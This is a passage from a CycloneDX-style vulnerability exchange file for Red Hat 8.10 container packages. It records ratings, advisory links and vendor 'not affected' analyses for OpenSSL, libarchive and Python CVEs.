          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-15469",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        347
      ],
      "description": "Issue summary: The 'openssl dgst' command-line tool silently truncates input\ndata to 16MB when using one-shot signing algorithms and reports success instead\nof an error.\n\nImpact summary: A user signing or verifying files larger than 16MB with\none-shot algorithms (such as Ed25519, Ed448, or ML-DSA) may believe the entire\nfile is authenticated while trailing data beyond 16MB remains unauthenticated.\n\nWhen the 'openssl dgst' command is used with algorithms that only support\none-shot signing (Ed25519, Ed448, ML-DSA-44, ML-DSA-65, ML-DSA-87), the input\nis buffered with a 16MB limit. If the input exceeds this limit, the tool\nsilently truncates to the first 16MB and continues without signaling an error,\ncontrary to what the documentation states. This creates an integrity gap where\ntrailing bytes can be modified without detection if both signing and\nverification are performed using the same affected codepath.\n\nThe issue affects only the command-line tool behavior. Verifiers that process\nthe full message using library APIs will reject the signature, so the risk\nprimarily affects workflows that both sign and verify with the affected\n'openssl dgst' command. Streaming digest algorithms for 'openssl dgst' and\nlibrary users are unaffected.\n\nThe FIPS modules in 3.5 and 3.6 are not affected by this issue, as the\ncommand-line tools are outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.5 and 3.6 are vulnerable to this issue.\n\nOpenSSL 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15469"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15469"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-v2vr-926q-29fr"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/310f305eb92ea8040d6b3cb75a5feeba8e6acf2f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a7936fa4bd23c906e1955a16a0a0ab39a4953a61"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-15469.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15469"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15469"
        }
      ],
      "published": "2026-01-27T16:16:14+00:00",
      "updated": "2026-06-17T08:37:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-1632",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        404,
        476
      ],
      "description": "A vulnerability was found in libarchive up to 3.7.7. It has been classified as problematic. This affects the function list of the file bsdunzip.c. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1632"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1632"
        },
        {
          "url": "https://github.com/Ekkosun/pocs/blob/main/bsdunzip-poc"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1632"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7454-1"
        },
        {
          "url": "https://vuldb.com/?ctiid.296619"
        },
        {
          "url": "https://vuldb.com/?id.296619"
        },
        {
          "url": "https://vuldb.com/?submit.496460"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1632"
        }
      ],
      "published": "2025-02-24T14:15:11+00:00",
      "updated": "2026-06-17T08:39:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1795",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        116
      ],
      "description": "During an address list folding when a separating comma ends up on a folded line and that line is to be unicode-encoded then the separator itself is also unicode-encoded. Expected behavior is that the separating comma remains a plan comma. This can result in the address header being misinterpreted by some mail servers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1795"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1795"
        },
        {
          "url": "https://github.com/python/cpython/commit/09fab93c3d857496c0bd162797fab816c311ee48"
        },
        {
          "url": "https://github.com/python/cpython/commit/70754d21c288535e86070ca7a6e90dcb670b8593"
        },
        {
          "url": "https://github.com/python/cpython/commit/9148b77e0af91cdacaa7fe3dfac09635c3fe9a74"
        },
        {
          "url": "https://github.com/python/cpython/commit/a4ef689ce670684ec132204b1cd03720c8e0a03d"
        },
        {
          "url": "https://github.com/python/cpython/commit/d4df3c55e4c5513947f907f24766b34d2ae8c090"
        },
        {
          "url": "https://github.com/python/cpython/issues/100884"
        },
        {
          "url": "https://github.com/python/cpython/pull/100885"
        },
        {
          "url": "https://github.com/python/cpython/pull/119099"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00013.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/MB62IZMEC3UM6SGHP5LET5JX2Y7H4ZUR/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1795"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7570-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
        }
      ],
      "published": "2025-02-28T19:15:36+00:00",
      "updated": "2026-07-31T14:16:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
